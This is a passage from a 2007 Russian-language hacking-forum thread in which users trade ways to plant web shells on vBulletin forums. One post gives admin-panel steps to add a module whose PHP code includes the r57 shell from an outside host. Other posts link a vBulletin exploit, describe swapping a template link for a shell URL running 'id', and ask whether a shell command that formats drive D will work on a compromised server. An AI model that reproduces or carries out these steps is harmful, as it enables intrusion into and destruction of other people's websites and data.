ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 10.04.2007, 14:48
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

у меня админка старая, а форум 3.5.4, поэтому через смайлы никак, а модуля вообще нетБтак что твой способ мне не поможет, но я точно помню кто то писал тут, что можно через шаблоны заливать и даже точно говорил как, перечитал 13 страниц поиска ничего не нашел...
 

  #32  
Старый 10.04.2007, 15:43
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159

Репутация: 950


По умолчанию

Цитата:
Сообщение от maxster  
у меня админка старая, а форум 3.5.4, поэтому через смайлы никак, а модуля вообще нетБтак что твой способ мне не поможет, но я точно помню кто то писал тут, что можно через шаблоны заливать и даже точно говорил как, перечитал 13 страниц поиска ничего не нашел...
Система модулей -> Управление модулями -> [Добавить новый модуль] -> Далее выбираешь Местоположение хака -> faq_complete. Заголовок пишешь любой к примеру 123
Код PHP модуля пишешь include "http://http://hcr.3dn.ru/expl/php/r57shell.txt";
Сохраняешь.И заходишь в FAQ и будет те счастье.
Да и незабудь выбрать модуль включен -> Да

Последний раз редактировалось cardons; 10.04.2007 в 15:55..
 

  #33  
Старый 12.04.2007, 00:36
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

А как подлить шелл в вобле 3.6.3?
 

  #34  
Старый 12.04.2007, 13:36
fersa
Новичок
Регистрация: 22.02.2007
Сообщений: 15
Провел на форуме:
74971

Репутация: 0
По умолчанию

Можно что нибудь зделать имея доступ супер модератора?
 

  #35  
Старый 12.04.2007, 15:31
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от fersa  
Можно что нибудь зделать имея доступ супер модератора?
http://milw0rm.com/exploits/3387 - vBulletin <= 3.6.4
 

  #36  
Старый 12.04.2007, 16:04
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от maxster  
...что можно через шаблоны заливать ...
вот c воблы 3.6.3 кусок с щаблончика(кто на форуме):
<a href="forumdisplay.php?$session[sessionurl]do=markread" rel="nofollow">$vbphrase[mark_forums_read]</a>-
менюшка: Навигация->Все разделы прочитаны

href="forumdisplay.php?$session[sessionurl]do=markread
- попробывал из админ панели изминить на :
http://www.myshell.ru/shell.php?cmd=id
но походу админ запретил изменения файлов форума,
мне не удалось поменять в шаблоне ни одного символа-
You don't have permission to access/somescript.php.Хотя я знаю что админ менял этот скрипт и другие(копирайты вобловcкие убрал ).
 

  #37  
Старый 12.04.2007, 16:42
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

Cпасибо конечно, но я же писал, что админка от 3.0.1 там нету вообще возможности добавлять модуль!

2AkyHa_MaTaTa
Я точно помню, я на ачате читал, что можно, надо будет самому потом разобраться
 

  #38  
Старый 13.04.2007, 01:16
valsha
Новичок
Регистрация: 05.04.2007
Сообщений: 9
Провел на форуме:
19173

Репутация: 0
По умолчанию

а нормально сработает такая конструкуия forumpath/faq.php?cmd=format d: /Q
с учетом того что шел нормально залился и forumpath/faq.php?cmd=dir показывает содержимое.
спасибо.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ